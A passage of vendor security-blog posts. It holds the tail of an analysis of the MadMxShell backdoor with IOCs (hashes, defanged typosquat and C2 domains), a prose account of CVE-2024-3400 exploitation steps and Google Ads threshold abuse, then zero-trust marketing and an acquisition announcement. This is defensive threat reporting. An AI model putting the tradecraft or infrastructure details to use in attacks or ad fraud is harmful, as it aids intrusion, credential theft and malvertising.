Data for the specific request follows it (for example: system information for request type 4).Table 4: The request message structure. Observed CommandsDuring our investigation, we observed the backdoor receiving the following commands from the C2 server: Collect system information (command type 4). Run systeminfo and ipconfig via cmd.exe (command type 5). Enumerate drives and specific directories, particularly the Windows system directory and user directories (command type 6). Some of the commands were received 60 mins to 90 mins after the backdoor registered with the C2 server, which may indicate an anti-analysis technique to defeat sandboxes or actual hands-on activity by the threat actor. Based on the capabilities of the stage 4 backdoor and the commands collected, we believe the attacker is likely interested in harvesting and exfiltrating information from infected machines. By focusing on IT teams, this threat actor can target users that have privileged access to sensitive systems (e.g., domain controllers) that can lead to a significant breach. Infrastructure DetailsOur analysis started with the domain, advansed-ip-scanner[.]net, that was live at the time of analysis and was serving a payload. WHOIS information for this domain revealed the attacker's email address used for registration to be [email protected]. A quick reverse WHOIS lookup using this email address revealed 45 domains registered between November 2023 and March 2024 to spoof various network scanning and IT management software. The complete list of domains used for malware distribution is provided in the IOCs section at the end of this blog. These domains were hosted on servers exclusively abused by the threat actor and belonged to the ASNs below: AS208312 (REDBYTES, RU) AS16276 (OVH, FR) The C2 domain litterbolo[.]com used a dedicated nameserver since the malware abused the DNS protocol for C2 communication. OSINT ResearchUpon further Open-Source Intelligence (OSINT) research, we discovered two accounts created by the threat actor on criminal underground forums like blackhatworld[.]com and social-eng[.]ru using the email address [email protected]. On the blackhatworld[.]com forum, the threat actor made two posts in a thread related to someone offering methods to bypass the Google Adsense threshold. This aligns with the Google Ads abuse technique used by the threat actor to launch their own malvertising campaign. The figures below show two posts made by the threat actor on blackhatworld[.]com expressing interest in this technique and asking to enroll in the course. Figure 9: Posts made by the threat actor showing interest in the Google Ads abuse course. Google Ads threshold accounts and techniques for abusing them are often traded on BlackHat forums. Many times they offer a way for the threat actor to add as many credits as possible to run Google Ads campaigns. This allows the threat actors to run campaigns without actually paying until the threshold limit. A reasonably high threshold limit lets the threat actor run the ad campaign for a significant amount of time. Once the threshold has reached, they can use the same technique with a new Google Ads account to repeat the process. Threat actors often use virtual credit cards (VCC) along with residential proxies to verify these Google Ads accounts and employ various methods to use them up to the maximum threshold. This approach effectively enables threat actors to run long lasting malvertising campaigns with a low investment and also avoid account suspension. ConclusionThe threat discussed in this blog demonstrates advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in targeting users in the IT security and network administration teams. The threat actor put significant effort into remaining undetected by evading memory forensics and network security controls. While we cannot currently attribute this activity to any known threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections are in place for our customers against these threats. We also suggest users follow security best practices and exercise caution when clicking on links appearing in Google search engine results. Users must also ensure to download software only from the official website of the developer. Zscaler CoverageFigure 10: Zscaler sandbox detection report In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to MadMxShell at various levels with the following threat names: Win32.Backdoor.MadMxShell Indicators Of Compromise (IOCs)File indicatorsSHA256 HashFilenameDescription7966ee1ae9042e7345a55aa98ddeb4f39133216438d67461c7ee39864292e015Advanced-ip-scanner.zipThe ZIP archive contains Advanced-ip-scanner.exe and OneDrive.exe, served by the malicious sites.0263663c5375289fa2550d0cff3553dfc160a767e718a9c38efc0da3d7a4b626Advanced-ip-scanner.exeThe original filename is oleview.exe, a legitimate binary from Microsoft that is vulnerable to DLL sideloading.722a44f6a4718d853d640381e77d1b9815d6f1663603859ff758ded896860cbaIVIEWERS.dllThe malicious DLL sideloaded by oleview.exe.bae2952c7d120d882746658e6d128556ae2498005072c4b7d7590a964b93c315 The IVIEWERS.dll without overlay.6de01c65c994e0e428f5043cb496c8adca96ba18dfd2953335d1f3c9b97c60c5 The stage 2 dropper EXE.9bba4c707de5a66d8c47e3e18e575d43ba8011302dad452230c4b9d6b314ee26OneDrive.exeThe legitimate binary from Microsoft that is vulnerable to DLL sideloading.287a0a80a995f1e62b317cf5faa1db94af6ee9132b0f8483afbd6819aa903d31Secur32.dllThe malicious DLL sideloaded by OneDrive.exe.b5162497bc2b9f1956d2145dd32daa5c99d6803544a0254a9090237628168d94 The icon resource ID 202 in the Secur32.dll which contains the encoded stage 4 backdoor.105e9a8d1014d2939e6b0ada3f24ad4bb6bd21f0155c284c90c7675a1de9d193 The stage 4 backdoor. Network indicators Malware distribution sites advaanced-ip-scanner[.]com advaanced-ip-scanner[.]net advanceb-ip-scanner[.]com advanceb-lp-scanner[.]com advanced-ip-saaner[.]com advanced-ip-scaaner[.]com advanced-ip-scaer[.]com advanced-ip-scaer[.]net advanced-ip-scanel[.]com advanced-ip-scanel[.]net advanced-ip-scanerr[.]com advanced-ip-scanerr[.]net advanced-ip-scanir[.]com advanced-ip-scanir[.]net advanced-ip-scanr[.]com advanced-ip-scanr[.]net advanced-ip-scanz[.]com advanced-ip-scanz[.]net advanced-lp-saanel[.]com advanced-lp-saaner[.]com advanced-lp-scanel[.]com advanced-lp-scannel[.]com advansed-ip-scanner[.]com advansed-ip-scanner[.]net advvanced-ip-scanner[.]com advvanced-ip-scanner[.]net angryipscan[.]net angryipscaner[.]com ipscannerprtg[.]com keystore-explore[.]com manageeengines[.]com manageeengines[.]net managengines[.]com managengines[.]net managengins[.]com managengins[.]net networkipscan[.]com networkscanip[.]com paesslers[.]com prtgscan[.]com C2 serverlitterbolo[.]com Google Ads linksDateGoogle Ads linkDestinationMarch 5th 2024www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwiN35j_vN2EAxUzGYMDHX4hA34YABABGgJzZg&ae=2&gclid=CjwKCAiAopuvBhBCEiwAm8jaMSAMzoon4dwGsotmQqrkJiOZVKq2nqUgh4h5tTNSLoOP21tibW_TXhoCmoYQAvD_BwE&ohost=www.google.com&cid=CAESVuD2_iSgJRfDJt5uaZ40PZqKlvgj6FO_6U_lr2TzogbqxMcQ-ID9Ciigvk2r4moSqJy-sawYk6hXUSYF7tgUuXPomWtbdnxcslhQNTVii1zjoR-Akmds&sig=AOD64_0RP5d4p4sMCY2XYek62uAF3iWaHQ&q&adurl&ved=2ahUKEwjH15L_vN2EAxVAyqACHRqDBBAQ0Qx6BAgHEAEipscannerprtg[.]comMarch 5th 2024www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwiStfbWpN6EAxVNS38AHbFZBN4YABACGgJvYQ&ase=2&gclid=EAIaIQobChMIkrX21qTehAMVTUt_AB2xWQTeEAAYAyAAEgILlvD_BwE&ohost=www.google.com&cid=CAASJeRo7dvz3CKRm4e4EhXJr2_o-d0_haudokhbkZ505hq6nEa2JOQ&sig=AOD64_3TPRDNISW_jutcN1faBIQQxDOshw&q&nis=6&adurl&ved=2ahUKEwj5q-_WpN6EAxXKL9AFHb3ID4cQ0Qx6BAgEEAEkeystore-explore[.]comMarch 8th 2024www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwjdlN6o3-SEAxVxgoMHHfe-BLIYABACGgJlZg&ase=2&gclid=CjwKCAiAi6uvBhADEiwAWiyRdhpRojhqTPETT3LIoSFRMYLK6PuHStezGHN2xQlXKluURhxieDQGLxoCrdkQAvD_BwE&ohost=www.google.com&cid=CAESVeD2KYxlP2QHuBG9qmLbwT1GsTtxSB9PtbXdt4kQsa_2gvy1Qp0FMaYcMP1wiS7KRVMjU7NX251AxcmT8WLG6KWPCEjLCDv-1uTWiNDdH2fHVm4rXzA&sig=AOD64_0Gk_XdMlDdW3N22zV8ASopY0pLow&q&nis=6&adurl&ved=2ahUKEwi969ao3-SEAxXChP0HHX2IBWsQ0Qx6BAgIEAEprtgscan[.]com MITRE ATT&CK FrameworkIDTacticDescriptionT1583.001Acquire Infrastructure: DomainsThe threat actor registered typosquatting domains and set up fake websites masquerading as legitimate software websites to deliver malware.T1583.002Acquire Infrastructure: DNS ServerThe threat actor configured a DNS server at litterbolo[.]com for C2 communication.T1583.008Acquire Infrastructure: MalvertisingThe threat actor leveraged Google malvertising, targeting search keywords related to IP and port scanners to lure users to visit malicious sites.T1204.002User Execution: Malicious FileThe attack chain is started by the user when they execute the fake Advanced-ip-scanner.exe file.T1574.002Hijack Execution Flow: DLL Side-LoadingThe threat actor leveraged two stages of DLL sideloading to execute the final payload.T1055.012Process Injection: Process HollowingThe threat actor employs process hollowing to inject and execute the stage 2 dropper EXE file.T1562.001Impair Defenses: Disable or Modify ToolsThe stage 3 launcher attempts to disable Windows Defender.T1070.004Indicator Removal: File DeletionThe stage 2 dropper runs a command via cmd.exe to delete the stage 1 EXE from disk.T1053.005Scheduled Task/Job: Scheduled Task The stage 3 launcher configures for persistence by masquerading as a scheduled task. T1036.004Masquerading: Masquerade Task or ServiceThe scheduled task masquerades as a OneDrive update to execute OneDrive.exe for malware persistence.T1036.005Masquerading: Match Legitimate Name or LocationOneDrive.exe and Secur32.dll are dropped to a subdirectory of %LOCALAPPDATA%\Microsoft\OneDrive, which is used by the legitimate OneDrive application.T1027.001Obfuscated Files or Information: Binary Padding IVIEWERS.dll is padded with 10 MB of null bytes to inflate the file size. This tactic can be used to evade security products that have a file size limit for analysis.T1027.007Obfuscated Files or Information: Dynamic API ResolutionMultiple stages use ROR13 API hashing based on the uppercase names of the APIs.T1027.009Obfuscated Files or Information: Embedded PayloadsThe next stage payloads are XOR encoded in the resources of stages 1 to 3.T1082System Information Discovery MadMxShell’s C2 command types 4 and 5 were utilized to enumerate system information and transmit data to the attacker’s C2 server.T1083File and Directory DiscoveryMadMxShell’s C2 command type 6 was utilized to enumerate files and directories on the infected machine.T1033System Owner/User DiscoveryMadMxShell sends the current username as part of the information collected by command type 4.T1005Data from Local SystemMadMxShell can read files on the infected machine when the C2 command type 6 is issued.T1071.004Application Layer Protocol: DNSMadMxShell abuses the DNS MX queries to establish C2 communication with the C2 server.T1132.002Data Encoding: Non-Standard EncodingC2 traffic uses custom encoding based on a lookup table.T1572Protocol TunnelingThe C2 protocol encodes data within MX queries and responses of the DNS protocol.T1041Exfiltration Over C2 ChannelThe collected data is exfiltrated via C2 communications.AppendixVisit our GitHub repository to access the Python script to decode C2 traffic. Wed, 17 Apr 2024 08:25:13 -0700 Roy Tay https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell https://www.zscaler.com/blogs/security-research/another-cve-pan-os-zero-day-another-reason-consider-zero-trust A Year of Critical Zero Days: Firewalls, VPNs, and more This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets — a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network — specifically VPNs and Firewalls. Today, CVE-2024-3400 was added to this list. This is a critical command injection vulnerability impacting Palo Alto Network’s PAN-OS software used in its GlobalProtect Gateway, which is a firewall service that facilitates VPN connectivity, among other things. The vulnerability has a CVSS score of 10.0, the maximum possible severity, because it is exploitable by an unauthenticated user. For particular PAN-OS versions and feature configurations, this flaw may allow attackers to execute arbitrary code with root privileges on the firewall. According to Palo Alto Networks, this vulnerability is being actively exploited in the wild. No individual vendor can be immune from vulnerabilities. However, what these zero-day attacks show is that legacy VPN & firewall-based architectures are vulnerable to a single point of failure, creating significant risk for organizations. One of the key differentiators of a true Zero Trust Architecture, meanwhile, is that it can dramatically reduce the attack surface of an organization. This is by making enterprises’ assets, applications, servers, devices, and more invisible to attackers — hiding them behind a cloud-proxy architecture — while entirely eliminating the need for such VPN and firewall products that are such frequent targets for attack. Attack Chain Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability. Attack ScenarioThe following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers. Initial Exploitation: the attackers scan for and exploit the command injection vulnerability. Persistence: use Cron job to download additional tools, including UPSTYLE, a python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel). Execution: Download and Execute commands from remote location by piping wget output to bash. Lateral Movement: in at least ‌one case, attackers pivoted internally across the affected networks via SMB and WinRM. Collection: the adversary attempted to obtain the domain backup DPAPI keys and targeted active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with users’ DPAPI keys. Next, the attacker copied configuration data from the firewall device. Additionally, Login data, cookies, and local state data for Chrome and Microsoft Edge were also compromised. This enabled the attacker to obtain the browser master key and decrypt sensitive data. Exfiltration: The stolen data files were saved to an externally accessible web directory for later retrieval by the attacker. Vendor RecommendationsUpdate 04/15/24: In response to this risk, Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of Apr 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3. Customers are advised to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days. In response to this risk, Palo Alto Networks advises customers to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Moreover, customers should monitor the network for any suspicious activity and follow security best practices. Affected VersionsVersion Affected Versions PAN-OS 11.1 < 11.1.2-h3 PAN-OS 11.0 < 11.0.4-h1 PAN-OS 10.2 < 10.2.9-h1 The problem is legacy technologyThe GlobalProtect vulnerability is the latest in a long line of VPN and Firewall-related security flaws. It’s April, and we have already seen critical CVEs for Ivanti, Sonicwall, FortiNet, and Cisco VPN solutions. This shows that the problem is not the vendor, but the vulnerable technology-driven legacy architecture that makes it a prime target for threat actors. VPNs were first used in 1996, a time when many of today’s complex and sophisticated cyberattacks did not exist. Traditional firewalls have been around even longer. Nearly three decades later, threat actors are still regularly finding ways to exploit these technologies. These assets expose organizations to enormous risk due to the fact that: They are externally exposed — ‘if it's reachable, it's breachable’ Their flawed architecture provides a beachhead into the corporate environments leading to lateral propagation, data exfiltration, compromising the entire environment. The fundamental problem with VPNs and firewalls is they create a public-facing point of contact to the outside world. They present sophisticated threat actors an opportunity to attack your organization until they discover a way in — think zero-day vulnerabilities. They bring both your users as well as threat actors (in the event of a successful exploit) onto your network. Given the potential reward from a successful exploit, we will continue to see threat actors targeting VPNs and firewalls. Recent zero-day vulnerabilities in exposed VPNs and firewalls One recent case of legacy architecture leading to zero-day exploits are the Ivanti vulnerabilities disclosed in December 2023. Multiple zero-day vulnerabilities in Ivanti’s VPN products were exploited by Chinese state-backed hackers taking advantage of flaws described in CVE-2023-46805 and CVE-2023-21887. The adversaries used these vulnerabilities to perform authentication bypass and remote command injection. Once these flaws were patched, attackers bypassed the fixes by leveraging other vulnerabilities (CVE-2024-21888). The workarounds used to circumvent the initial patch allowed attackers to enable privilege escalation and perform server-side request forgery. In February 2024, CISA released another VPN-related alert about an attack on Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD). In this case, the Akira ransomware group exploited a vulnerability (CVE-2020-3259) to steal information by leveraging misconfigured instances of WebVPN/AnyConnect. These repeated zero day attacks on VPN show that the real issue is the outdated architecture, not the specific vendors involved. How zero-day threats enable the four-stage attack sequence Enterprises should understand that attackers target vulnerabilities in their exposed, internet-connected assets. This includes firewalls and VPNs, which are among the primary vectors used to breach organizations and steal their data. Moreover, it is not only these initial assets that expose enterprises to enormous risk — it is also the underlying network architecture, which allows attackers, once they have compromised these initial assets, to move laterally, find enterprises’ most critical applications and data stores, and steal their data. Reconnaissance. Attackers scan for critical vulnerabilities in the external enterprise attack surface, including zero-day vulnerabilities in VPNs and firewalls. Initial compromise. Threat actors exploit these VPN and firewall vulnerabilities to gain initial access to enterprises devices and the network. Move laterally. Attackers establish persistence and move laterally across the network, scanning for high-value assets, stealing other credentials, and compromising additional systems. Steal data. Once threat actors have compromised your critical assets and data, they will work to exfiltrate it from the network. In the case of ransomware, attackers may additionally deploy ransomware, often leveraging a domain controller, to bring down the victim’s environment. Figure 3. The four-stage attack sequence. How can enterprises reduce the impact of zero-day attacks? While it will always be essential for enterprises to patch critical vulnerabilities, the only meaningful way to stay ahead of these types of zero-day attacks is for organizations to adopt a zero trust architecture. Avoid them altogether, from a first principles perspective. Here are some fundamental zero trust principles that organizations can adopt to mitigate the risks of exposed assets like VPNs, firewalls, and more. Eliminate Your Attack Surface: Implement Zero Trust. While the term ‘zero trust’ is heavily used (and abused), it’s for good reason: zero trust principles, and their accompanying architecture, represent the only way enterprises can overcome the risks associated with legacy networks, including vulnerabilities in firewalls and VPNs. These principles are not merely buzzwords applied to legacy products (virtualized VPNs and Firewalls are not zero trust) — they are goals that require technological transformation and a cloud-first approach to accomplish. Per the NSA Zero Trust Security Model, there are three fundamental principles enterprises should adopt. Never trust, always verify. Enterprises should treat every user, device, application, workload, or data flow as untrusted. Moreover, enterprises should never connect users to the underlying network, but directly to applications using a cloud-proxy architecture. Assume a breach has happened. Particularly given the recent pace of zero day vulnerability disclosures, enterprises should operate with an assumption that threat actors have already gained persistence in their environment and defend their crown jewel applications — where their most critical data is stored — accordingly. Verify Explicitly with least privilege access. Enterprises should allow trust only after seven layers of zero trust security, identity, and contextual attributes have been established. Figure 4. Seven layers of security enabled with a Zero Trust architecture (in this case the Zscaler Zero Trust Exchange). In practice, a zero trust architecture is fundamentally different from those built on firewalls and VPNs. Compared to traditional, perimeter-based networking approaches, which place users on the enterprise network, a zero trust architecture enables one-to-one connectivity between requesters and resources. This could include, for instance, users connecting to applications, but it could also enable connectivity between workloads, branch locations, remote users and operational technology (OT) systems, and much more. A cloud native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange: Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud. Stops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real-time. Eliminates lateral threat movement by connecting entities to individual IT resources instead of extending access to the entire network. Blocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use. Best practices for enterprisesIn light of these recent zero-day vulnerabilities, it is imperative that enterprises employ the following best practices to fortify their organization against potential exploits: Minimize the attack surface: make apps (and vulnerable VPNs) invisible to the internet, and impossible to compromise, ensuring an attacker can’t gain initial access. Prevent initial compromise: inspect all traffic in-line to automatically stop zero-day exploits, malware, or other sophisticated threats. Enforce least-privileged access: restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources. Block unauthorized access: use strong multi-factor authentication (MFA) to validate user access requests. Eliminate lateral movement: connect users directly to apps, not the network, to limit the blast radius of a potential incident. Shutdown compromised users and insider threats: enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data. Stop data loss: inspect data in motion and data at rest to stop active data theft during an attack. Deploy active defenses: leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real time. Test your security posture: get regular third-party risk assessments and conduct purple team activities to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results of these reports with your security team. ConclusionToday’s zero-day vulnerability impacting Palo Alto Network’s GlobalProtect Gateway product represents yet another unfortunate milestone in a clear enterprise trend: traditional, perimeter-based approaches to security and networking face systemic, not temporary, security weaknesses that cannot be waved away with any single security patch. Of course, no vendor can be immune from software defects and vulnerabilities. However, given the back-to-back CVEs impacting firewalls, VPNs, supply chain tools, and more, it should be clear to security leaders and practitioners that zero trust security is crucial. Adopting a cloud-delivered zero trust architecture removes the attack surface created by legacy technology. Denying attackers their traditional beachheads — the vulnerabilities in VPNs, firewalls, and the like — is key for creating a more robust and secure environment. Referenceshttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/ https://unit42.paloaltonetworks.com/cve-2024-3400/ If you are concerned about these vulnerabilities, please contact Zscaler at [email protected] for a free external attack surface assessment as well as professional consultation on how you can migrate from legacy architectures to Zero Trust. Acknowledgement for analysis: Atinderpal Singh, Will Seaton Fri, 12 Apr 2024 22:23:31 -0700 Deepen Desai https://www.zscaler.com/blogs/security-research/another-cve-pan-os-zero-day-another-reason-consider-zero-trust https://www.zscaler.com/blogs/product-insights/why-you-need-proven-platform-zero-trust Organizations need a proven platform for zero trust. But before we dive into why that is the case, we must first answer two important questions. What is zero trust? Zero trust is a distinct architecture that provides secure connectivity based on the principle of least-privileged access. It inherently prevents excessive permissions, and gives users and entities access only to the specific IT resources they need in order to do their jobs. On top of that, zero trust means analyzing context to assess risk and determine whether or not to grant access, rather than using identity alone to do so. This is all achieved through a cloud platform that delivers zero trust connectivity as a service at the edge—meaning from as close to the end user as possible. In short, think of a zero trust platform as an intelligent switchboard. Figure 1: Zero trust architecture with Zscaler What is zero trust not? Yesterday’s perimeter-based architectures are built on firewalls and VPNs, which connect users to the networks that house resources rather than connecting them directly to the resources themselves. A commonly used name for such an architecture—castle-and-moat—illustrates the way that it is designed to function. That is, establishing a moat (perimeter) around a castle (network) in order to keep bad things out and good things in. However, if a threat makes it past the moat, there’s no second line of defense to prevent the threat from entering the castle and having free rein to move about within it. In security terms, we call this lateral movement—when a threat moves across network resources unrestricted. To read more about lateral threat movement and other shortcomings of perimeter-based architecture, you can read this ebook. Figure 2: Perimeter-based architecture Now that we understand zero trust as a distinct, cloud-delivered architecture, let’s return to our original point that organizations need a proven platform for zero trust. Namely, a vendor’s zero trust offering must be proven across the three key areas described below. Scalability When all of an organizations’ traffic is routed through a zero trust vendor’s cloud for security and connectivity, that cloud platform becomes a mission-critical service that must have the scalability necessary to ramp up with customers’ evolving traffic volumes in real time. Without it, organizations’ security and connectivity grind to a halt, taking productivity down with them. Additionally, a lack of scalability means that encrypted traffic typically goes at least partially (and sometimes completely) uninspected. This is because inspecting encrypted traffic is a resource-intensive process that requires a high level of performance. With 95% of web traffic now encrypted—and cybercriminals hiding 86% of their attacks within it—organizations must be able to inspect encrypted traffic at scale if they are to stop threats and data loss. One may assume that these scalability challenges only arise for larger organizations, but that is untrue. Without a proven zero trust platform that can scale, smaller organizations can also face these challenges, particularly as their businesses grow and their vendors need to ramp up services seamlessly. In other words, organizations of all sizes need a zero trust platform built on a cloud with proven scalability. Something you may not know about Zscaler is that our name stands for “zenith of scalability.” Since our company was founded, we’ve been committed to delivering unrivaled performance. The Zero Trust Exchange, the name of Zscaler’s zero trust platform, is the world’s largest inline security cloud. It boasts a variety of statistics and proof points that demonstrate its massive capacity for scale: 150 data centers worldwide (not merely on-ramps or vPoPs) 400 billion requests processed each day 500 trillion telemetry signals analyzed daily 9 billion incidents and policy violations prevented each day 150 million cyberthreats blocked daily 250,000 unique security updates implemented each day So, when it comes to choosing a zero trust platform, why settle for anything less than the zenith of scalability? Figure 3: A snapshot of some of Zscaler’s data centers around the world Resilience Business continuity planning for mission-critical services is a board-level priority for IT leaders. As mentioned previously, a zero trust platform’s strategic inline position between users, workloads, apps, and more, makes it a mission-critical service. As such, organizations need to know that unforeseen events won’t disrupt their vendor’s services; otherwise, security, connectivity, and productivity will all suffer. Zscaler Resilience is a core component of the Zero Trust Exchange. It is a complete set of resilience capabilities that offers high availability and serviceability at all times. Customer-controlled disaster recovery features and other robust failover options ensure uninterrupted business continuity, even during catastrophic events. Zscaler offers the following capabilities for the following scenarios: For minor failures, such as node crashes or software bugs, Zscaler can effectively handle the issues with minimal customer interaction. In the event of brownouts or service degradation issues, Zscaler Resilience offers dynamic, performance-based service edge selection, customer-controlled data center exclusion, and other failover mechanisms to maintain seamless experiences for users. For blackouts or severe connectivity issues, Zscaler provides failover options to redirect traffic to secondary Zscaler data centers nearby, ensuring that users can continue to access mission-critical applications. If there are catastrophic events, Zscaler Resilience provides customer-controlled disaster recovery capabilities, allowing organizations to keep their operations running by routing traffic to private service edges and restricting access to critical applications. Figure 4: Zscaler Resilience functionality A history of customer success In addition to scalability and resilience, zero trust platforms must have demonstrated success with actual customers using their services. Organizations need to see the success stories of customers that are similar to them in terms of size, industry, and their security and connectivity challenges—only then should they trust their vendor of choice. This is particularly true for bigger organizations because they need evidence that a zero trust platform can handle larger volumes of traffic and more rigorous performance requirements. At Zscaler, we have a litany of customer success stories available on our website in the form of videos, blogs, case studies, and press releases. Our company has demonstrated success with organizations of all sizes and in all geographies—from small, 100-user organizations like the Commonwealth Grants Commission in Australia, to those with hundreds of thousands of users, like Siemens in Germany, and beyond, to the New York City Department of Education and the 1 million users it secures with the Zero Trust Exchange. Here are some more facts and figures that demonstrate our customers’ trust and belief in our platform: Nearly 8,000 customers of all sizes, industries, and geographies Over 41 million users secured by the Zero Trust Exchange A Net Promoter Score of more than 70 (the average SaaS company’s is 30) More than 40% of the Fortune 500 are customers More than 30% of the Global 2,000 are customers Below are some of our customers across a variety of industries. Each logo is associated with a public-facing customer success story that can be found on our website by typing the customer’s name into the search feature. Figure 5: A snapshot of some Zscaler customers Where to go from here If you are still getting your feet wet with zero trust and would like to listen to an entry-level discussion on the subject, register for our monthly webinar, Start Here: An Introduction to Zero Trust. You may also want to read our ebook, 4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches. Or, if you would like to learn more about Zscaler Resilience and how the Zero Trust Exchange provides uninterrupted business continuity to customers, read our solution brief. Tue, 16 Apr 2024 07:30:01 -0700 Jacob Serpa https://www.zscaler.com/blogs/product-insights/why-you-need-proven-platform-zero-trust https://www.zscaler.com/blogs/company-news/zscaler-acquires-airgap-networks-extends-zero-trust-sase OverviewToday, Zscaler has announced the next major step in its Zero Trust SASE leadership by signing an agreement to acquire Airgap Networks, which provides agentless segmentation for enterprise IT and OT environments. With this acquisition, Zscaler will combine its Zero Trust SD-WAN with Airgap to extend the Zero Trust Exchange to protect east-west traffic in branch offices, campuses, factories and plants with critical OT infrastructure. This next step in our SASE leadership will eliminate the need for east-west firewalls, NACs and microsegmentation and deliver greater operational simplicity. Controlling lateral movement is the cornerstone of Zero TrustTo understand why today’s news is important, let’s reflect on challenges that organizations face in combating attackers. Adversaries are becoming faster and ever more effective at evading even the most sophisticated security controls with AI-enhanced social engineering and identity-based attacks. Once they compromise an organization, they then move laterally to get to sensitive data or critical resources. Once the targets or crown jewels (typically high value data) have been identified and reached, the goal is to exfiltrate the data as quickly and quietly as possible. While Zero Trust cannot be achieved without a holistic strategy that addresses every stage of this typical cyber attack chain - also known as a defense-in-depth approach - restricting lateral movement, and proper containment of the adversary once your organization has been compromised, is where real Zero Trust technologies must prove their worth. To date, the primary vehicle for addressing lateral movement on local area networks has been network-based segmentation and microsegmentation. How traditional segmentation and firewalls have fallen shortSegmentation has been carried out with aging, IP-centric networking technologies like NAC and east-west firewalls, managed through complex constructs like ACLs based on MAC, IP addresses and VLANs. This complexity places considerable strain on network operations teams forced to write, maintain and update countless ACLs or internal firewall rules while addressing the inevitable misconfigurations that break business critical applications or leave gaps in segmentation coverage. The complexity that east-west firewalls bring means most segmentation projects are never fully implemented and, even those with partial completion quickly experience segmentation policy drift as workloads and applications move and organizations’ environments change. The significance of a ‘network of one’Why is Airgap’s technology so compelling? Their agentless, identity-based approach to segmentation is a total re-think of the complexity of legacy segmentation approaches, for stronger, more predictable segmentation outcomes and greater operational simplicity. This highly secure but simplified approach includes Dynamic Host Configuration Protocol (DHCP) proxy, which creates a "network of one" for all connected endpoints, including those enabled with static IP. For example, the DHCP proxy intercepts all DHCP requests from devices trying to join the LAN. This enables Airgap to assign a /32 IP address and default gateway, effectively creating a segment of one. Airgap can then dynamically control access through continuous assessment of identity and context. Now, Airgap can provide visibility and policy enforcement at every connected endpoint without adding any software to those sensitive endpoints. This approach eliminates the risk of east-west lateral movement on local networks as well as the complexity of traditional segmentation approaches like east-west firewalls, without hardware upgrades or operational disruption. Agentless SegmentationIt is critical to understand that an agentless approach is essential for effective east-west segmentation on LANs, given that in many scenarios, be it unmanaged devices, aging legacy servers, or headless IoT/OT infrastructure, deploying agents is an impossibility. However, with Airgap, Zero Trust segmentation is possible in campus LAN and OT environments, no matter the device. Comprehensive Zero Trust Segmentation If you have been a customer or followed Zscaler, you’ll know we take segmentation very seriously, as a measure to counter lateral movement of threats. In the Zero Trust Exchange, we currently protect thousands of organizations with Zero Trust Segmentation which comprises multiple methods of segmentation depending on the environment and scenario. This includes Zero Trust SD-WAN to securely connect locations and segment them without site-to-site VPNs. Zero Trust Segmentation is made up of: User-to-app segmentation: Users access private applications directly, without being put on a network. Location Segmentation: Zero Trust SD-WAN ensures connections are made directly to applications from an office, rather than connecting to a routable network. No more site-to-site VPNs Workload segmentation: Least-privilege access segments cloud workload-to-workload communications across hybrid and multi-cloud environments. Now with Airgap, we further extend Zero Trust Segmentation to deliver visibility and segmentation for east-west traffic on LANs, including critical OT environments. Some of the use cases that can be addressed on day one are: East-West Firewall Replacement We will extend Zero Trust to the LAN by enforcing segmentation on east-west traffic. This shrinks the internal attack surfaces and eliminates the threat of lateral movement on campus, data center, and OT networks. There is no need for NAC or firewall-based segmentation. To enforce zero trust segmentation on campus, branch, and data center networks, Airgap will: Automatically provision every device into a segment of one (/32) Auto group devices, users and apps by analyzing the traffic patterns. This prevents rogue devices using MAC spoofing to get on to the network. Dynamically enforce policies for east-west traffic based on identity and context of users and devices. IT/OT SegmentationAirgap’s technology acts as a ransomware kill switch, disabling non-essential device communication to halt lateral threat movement without interrupting business operations. Airgap’s solution neutralizes advanced threats, such as ransomware on IoT devices, OT systems, and agent-incapable devices. To secure IoT and OT, Airgap will: Autonomously group and enforce policy for known MAC addresses on any device; eg. RDP access to cameras denied except for Admins Automatically isolate unknown MAC addresses to limit blast radius in case of a compromised device. Integrate with asset management systems for secure access control policies. Automatic Device Discovery & ClassificationA significant portion of IT/OT traffic stays within the factory or campus, hence it is important to have continuous visibility into east-west traffic. With automatic device discovery and classification, network admins can better manage performance, uptime and security for IoT/OT systems without complex inventory management. For network and device visibility, Airgap will: Discover, classify and inventory IoT/OT devices without the need for endpoint agents Get a baseline of traffic patterns and device behaviors in order to determine authorized and unauthorized access. Gain AI-driven network insights for performance management and threat mapping. Modern segmentation for the enterprise, without the complexity Eliminate lateral threat movement across the LANs. Reduce operational complexity and cost associated with legacy segmentation tools. Gain 